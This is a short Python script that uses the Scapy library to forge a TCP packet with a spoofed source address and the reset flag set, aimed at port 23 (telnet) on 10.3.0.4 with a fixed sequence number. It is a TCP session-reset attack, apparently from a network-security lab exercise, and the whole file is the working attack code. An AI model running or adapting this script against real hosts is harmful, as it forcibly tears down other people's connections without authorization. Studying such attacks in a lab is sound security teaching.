#!/usr/bin/env python3
from scapy.all import IP,TCP,send,ls
ip = IP(src="10.3.0.3", dst="10.3.0.4")
tcp = TCP(sport=40060, dport=23, flags="R", seq=1838235189)
pkt = ip/tcp
ls(pkt)
send(pkt, verbose=0)